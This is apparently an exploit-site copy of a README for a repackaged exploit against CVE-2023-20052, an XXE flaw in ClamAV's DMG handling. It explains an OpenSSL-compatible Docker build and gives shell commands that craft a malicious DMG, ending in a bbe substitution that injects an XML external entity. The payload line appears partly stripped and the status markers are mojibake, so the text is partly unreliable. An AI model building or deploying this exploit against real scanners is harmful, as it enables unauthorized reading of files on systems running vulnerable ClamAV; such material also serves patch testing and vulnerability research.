Share
## https://sploitus.com/exploit?id=96FCEE45-656A-5F86-AE56-904C1A48A17A
# CVE-2023-20052 Exploit - Fixed Build
Fixed Docker build for CVE-2023-20052 (ClamAV XXE vulnerability) that actually compiles.
## What Was Broken
The original exploit fails to build on modern systems:
- โ OpenSSL 3.0 compatibility errors
- โ `HMAC_CTX` struct incomplete type errors
- โ Implicit function declaration errors
- โ Build fails at `dmg/filevault.c` compilation
## What I Fixed
1. **Changed base image**: Ubuntu 22.04 โ Ubuntu 18.04
2. **Fixed OpenSSL version**: Uses `libssl1.0-dev` (OpenSSL 1.0)
3. **Added non-interactive mode**: Prevents build prompts
4. **Working Dockerfile**: Actually compiles successfully
## Why This Works
`libdmg-hfsplus` uses deprecated OpenSSL 1.0 functions:
- `HMAC_CTX_init()` / `HMAC_CTX_cleanup()` (removed in OpenSSL 1.1+)
- Direct `HMAC_CTX` struct usage (opaque in OpenSSL 1.1+)
Ubuntu 18.04 is the last LTS with OpenSSL 1.0 support.
## Build & Usage
```bash
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .
# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash
# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|| ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg
```
## Credits
- Original exploit: [nokn0wthing/CVE-2023-20052](https://github.com/nokn0wthing/CVE-2023-20052)
- Fixed by: https://reapsec.com
```
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus
```